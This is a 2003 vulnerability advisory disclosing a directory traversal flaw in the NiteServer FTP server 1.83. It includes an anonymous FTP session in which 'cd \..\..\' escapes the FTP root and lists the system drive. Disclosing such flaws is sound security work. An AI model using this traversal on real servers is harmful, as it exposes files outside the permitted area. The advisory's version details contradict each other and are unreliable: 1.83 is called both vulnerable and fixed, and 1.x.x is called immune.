Directory traversal vulnerabilities found in NITE ftp-server version 1.83 Discovered by Dennis Rand ------------------------------------------------------------------------ ----[SUMMARY The NiteServer is a simple FTP-Server program with some special features. It is free and easy to use. The following commands are recognized : USER PORT RETR REST PASS STOR CWD DELE HELP LIST so it should work with any usual ftp-client. Special Download-Ratio features are implemented. User-logins are logged with their IP-Number, so the Up/Download-Ratio will be held for the future. Spy users, watch what they are up- or downloading. Are you interested in learning Visual Basic Internet programming ? Do you need some different features ? You can purchase the source-code (VB 6.0) from the Author. Simply send a check about 25 US-$ to A directory traversal vulnerability in the product allows remote attackers to cause the server to traverse into directories that reside outside the bounding FTP root directory. ----[DETAILS Vulnerable systems: Windows NT 4.0 and Windows 2000 server fully patched * Niteserver Version:1.83 - Author: Thomas Krebs Immune systems: * NiteServer version 1.x.x NiteServer failure to filter out "\.." sequences in command requests allows remote users to break out of restricted directories and gain read access to the system directory structure; Possibility for discovering the directory structure outside the configured areas. The following transcript demonstrates a sample exploitation of the vulnerabilities: Connected to 192.168.1.22. 220- Niteserver Version:1.83 220- Author: Thomas Krebs 220- email: turtie@knuut.de 220- Welcome to the Niteserver 220- First Author: Thomas Krebs! 220- 220 User (192.168.1.22:(none)): anonymous 331 User anonymous accepted, send password..... Password: 230 User anonymous accepted, ok come on..... ftp> ls 200 PORT command ok.... 257 "c:/ftpd/data" is working directory...c:\ftpd\data ftp> cd / 250 Directory changed to"c:\ftpd\data" . ftp> cd .. 250 Directory changed to"c:\ftpd\data" . ftp> cd \..\..\ 250 Directory changed to"c:\" . ftp> ls 200 PORT command ok.... 257 "c:/" is working directory...c:\ 200 PORT command successful 150 Opening ASCII mode data connection for /bin/ls. -rwxr-xr-x 1 User Group 0 Dec 23 12:17 AUTOEXEC.BAT -rwxr-xr-x 1 User Group 0 Dec 23 12:17 CONFIG.SYS drwxr-xr-x 1 User Group 0 Dec 23 12:25 I386 drwxr-xr-x 1 User Group 0 Dec 23 22:22 Inetpub drwxr-xr-x 1 User Group 0 Dec 23 21:49 Installationsfiler til Windows Update -rwxr-xr-x 1 User Group 0 Dec 23 12:17 IO.SYS -rwxr-xr-x 1 User Group 0 Dec 23 12:17 MSDOS.SYS drwxr-xr-x 1 User Group 0 Dec 23 21:25 Multimedia Files -rwxr-xr-x 1 User Group 26816 Dec 23 22:30 NTDETECT.COM -rwxr-xr-x 1 User Group 156496 Dec 23 22:30 ntldr drwxr-xr-x 1 User Group 0 Dec 23 12:36 OptionPack -rwxr-xr-x 1 User Group 134217728 Dec 30 15:24 pagefile.sys drwxr-xr-x 1 User Group 0 Dec 30 15:19 Program Files drwxr-xr-x 1 User Group 0 Dec 23 12:24 RECYCLER drwxr-xr-x 1 User Group 0 Dec 24 00:08 TEMP drwxr-xr-x 1 User Group 0 Dec 30 16:30 WINNT 226 Listing complete. ftp: 1181 bytes received in 0,12Seconds 9,76Kbytes/sec. ftp> bye 221 Goodbye. ----[DETECTION Niteserver Version:1.83 is vulnerable to the above-described attacks. Earlier versions may be susceptible as well. To determine if a specific implementation is vulnerable, experiment by following the above transcript. ----[VENDOR RESPONSE Niteserver Version:1.83 fixes this issue. The latest version is available from come.to/niteserversite ----[DISCLOSURE TIMELINE 01/02/2003 Found the Vulnerability. 01/02/2003 Author notified (turtie@knuut.de) 01/13/2003 No Responses received from turtie@knuut.de 01/13/2003 Public Disclosure. ----[ADDITIONAL INFORMATION The vulnerability was discovered by Dennis Rand ----[DISCLAIMER The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.